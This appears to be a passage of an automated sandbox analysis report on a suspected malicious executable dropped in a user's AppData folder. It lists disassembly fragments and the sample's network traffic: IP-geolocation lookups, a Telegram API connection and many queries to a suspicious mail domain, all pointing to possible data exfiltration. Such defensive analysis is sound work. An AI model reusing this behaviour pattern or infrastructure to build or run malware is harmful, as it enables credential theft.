                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F9D92h8_2_005F9A98
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FE082h8_2_005FDD88
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F4C51h8_2_005F4980
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FB57Ah8_2_005FB280
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F3E89h8_2_005F3BB8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FB0B2h8_2_005FADB8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F5581h8_2_005F52B0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F6C79h8_2_005F69A8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FF3A2h8_2_005FF0A8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005F1571h8_2_005F12A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 005FC89Ah8_2_005FC5A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0061033Ah8_2_00610040
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00611B22h8_2_00611828
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0061330Ah8_2_00613010
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00611FEAh8_2_00611CF0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 006137D2h8_2_006134D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0061297Ah8_2_00612680
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00611192h8_2_00610E98
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0061165Ah8_2_00611360
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00612E42h8_2_00612B48
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00610802h8_2_00610508
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00610CCAh8_2_006109D0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00613C9Ah8_2_006139A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 006124B3h8_2_006121B8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067AD11h8_2_0067AA68
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067BA19h8_2_0067B770
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00673319h8_2_00673070
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00674021h8_2_00673D78
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067C721h8_2_0067C478
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067EC49h8_2_0067E978
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067FA11h8_2_0067F740
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00676FE9h8_2_00676D40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00677CF1h8_2_00677A48
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 006789F9h8_2_00678750
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00679701h8_2_00679458
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067C2C9h8_2_0067C020
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00673BC9h8_2_00673920
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067CFD1h8_2_0067CD28
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 006748D1h8_2_00674628
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 006755D9h8_2_00675330
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067DCD9h8_2_0067DA30
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 006762E1h8_2_00676038
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 006792A9h8_2_00679000
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067F0E1h8_2_0067EE10
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067B5C1h8_2_0067B318
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00675E89h8_2_00675BE0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067E7B1h8_2_0067E4E0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00676B91h8_2_006768E8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00677899h8_2_006775F0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 006785A1h8_2_006782F8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067B169h8_2_0067AEC0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067BE71h8_2_0067BBC8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00673771h8_2_006734C8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067CB7Bh8_2_0067C8D0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00674479h8_2_006741D0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00675181h8_2_00674ED8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067D881h8_2_0067D5D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00678149h8_2_00677EA0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067F579h8_2_0067F2A8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00678E51h8_2_00678BA8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00679B59h8_2_006798B0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067D429h8_2_0067D180
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00674D29h8_2_00674A80
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00675A31h8_2_00675788
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 0067E1C5h8_2_0067DE88
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00676739h8_2_00676490
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 00677441h8_2_00677198
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 006EC5E5h8_2_006EC431
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_006E5F38
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then mov ecx, dword ptr [ebp-40h]8_2_006E7318
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_006EB5C1
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then mov ecx, 000003E8h8_2_006E75A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_006EBC6B
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_006E2E16
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_006E2AF4
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_006EB8C2
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_006EB8C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then push 00000000h8_2_006EB17C
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then push 00000000h8_2_006EC12E
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_006EC12E
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_006E5F28
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then jmp 006EC5E5h8_2_006EC535
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then push 00000000h8_2_006E950F
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_006E2B00
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then mov ecx, dword ptr [ebp-40h]8_2_006E7315
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_006EC3A1
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: checkip.dyndns.org
                Source: global trafficDNS query: name: reallyfreegeoip.org
                Source: global trafficDNS query: name: api.telegram.org
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficDNS query: name: mail.jhxkgroup.online
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49169 -> 132.226.8.169:80
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 132.226.8.169:80
                Source: global trafficTCP traffic: 192.168.2.22:49175 -> 158.101.44.242:80
                Source: global trafficTCP traffic: 192.168.2.22:49177 -> 193.122.130.0:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
